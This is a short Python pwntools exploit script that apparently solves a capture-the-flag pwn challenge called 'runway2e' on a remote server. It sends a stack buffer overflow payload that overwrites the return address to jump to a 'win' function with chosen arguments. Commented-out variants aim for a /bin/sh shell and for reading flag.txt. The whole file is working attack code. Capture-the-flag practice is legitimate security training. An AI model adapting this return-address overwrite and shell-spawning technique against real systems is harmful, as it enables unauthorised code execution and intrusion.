#!/usr/bin/env python3
from pwn import *
import warnings
warnings.filterwarnings("ignore")
exe = ELF("./runway2e")
# context.log_level='debug'
p = remote("challs.pwnoh.io", 13402)
# p = process([exe.path])
def gdbs():
    context.terminal = ["foot"]
    gdb.attach(p, gdbscript="""

               """)
    # p = gdb.debug([exe.path],"""
    #
    #                 """)

sla = lambda msg, data: p.sendlineafter(msg, data)
sa = lambda msg, data: p.sendafter(msg, data)
sl = lambda data: p.sendline(data)
s = lambda data: p.send(data)
# gdbs()
# sla("?",b"b"*(0x18)+p32(0x804c054)+p32(0x0804924D)+p32(exe.search("/bin/sh").__next__())+p64(0))
sla("?",b"b"*(0x18)+p32(0x804c054)+p32(exe.sym.win)+p32(0)+p32(0xC0FFEE)+p32(0x7AB1E))
# sla("?",b"b"*(0x18+4)+p32(0x0804922A))
# sl("cat flag.txt")








p.interactive()
# good luck pwning :)

